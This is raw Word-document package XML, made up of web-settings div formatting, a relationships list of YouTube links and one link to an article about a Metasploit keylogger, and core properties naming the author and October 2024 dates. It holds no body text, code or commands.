          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="54668140">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1538855210">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1936017637">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="132673092">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1507943477">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1871650170">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1837644040">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="301664422">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1243177604">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="221134273">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="834809366">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="382412202">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="243302167">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="879242414">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="786893292">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="10640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3907">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="850337678">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1200629843">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2139175859">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1382828051">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="660740904">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1698699096">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="345328048">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="124200825">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1335524799">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1001930845">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1403865317">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="108479493">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="491028449">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="8147550">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1855073421">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1134101848">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="21386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3">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2021541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watch?v=S8fZpwBDkGY"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hyperlink" Target="https://www.youtube.com/watch?v=_sBenYYr0-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F7ZyerLyTbY"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hyperlink" Target="https://www.youtube.com/watch?v=S8fZpwBDkGY"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youtube.com/watch?v=ytvKVYYrqEw" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=F7ZyerLyTb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iguru.gr/chrisimopoiiste-keylogger-sto-metasploit-framework/" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=Z0Jfcv29Cy8" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=S8fZpwBDkGY"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2068</TotalTime>
  <Pages>7</Pages>
  <Words>780</Words>
  <Characters>4452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Nguyễn Đức</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Thành Nguyễn Đức</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-06T06:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-10T04:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>